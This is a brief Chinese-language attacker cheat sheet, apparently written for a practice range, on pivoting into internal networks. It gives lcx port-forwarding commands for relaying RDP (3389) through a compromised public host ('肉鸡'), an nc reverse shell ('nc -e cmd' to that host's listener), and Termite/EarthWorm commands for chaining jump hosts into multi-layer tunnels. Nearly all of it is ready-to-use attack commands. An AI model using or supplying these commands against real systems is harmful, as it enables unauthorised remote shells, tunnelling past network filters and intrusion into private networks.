靶场
端口转发;
lcx
正向代理：3389 主办方过滤
lcx -tran 5000 ip 3389
反向代理：无法访问攻击的内网的机器 内网的机器可以访问公网
需要一台公网的肉鸡
内网的3389转到肉鸡的8888
lcx -slave 公网ip 8888 127.0.0.1 3389
监听肉鸡的8888端口 8888端口的请求转发到7777端口
lcx.exe –listen 8888 7777
linux portmap     

nc反弹shell
肉鸡上监听6666
nc -lvp 6666
nc -e cmd 肉鸡 6666


Termite(EarthWorm)
admin.exe win7下无法执行
跳板机：
agent -l 8888
本机（管理机）
admin -c ip -p 8888
加入新跳板机后
agent -c ip -p 8888
形成多层内网
0W 
	+– 1L 
		| +– 2L
可以到跳板机进行管理
goto 节点id
ip为相对于当前跳板机ip。
把需要攻击机器的端口转发到当前节点（跳板机）的端口
lcxtran 8888 ip 3389


通过http协议，把所有数据都转化为二进制，然后通过80端口。
效率低！！！

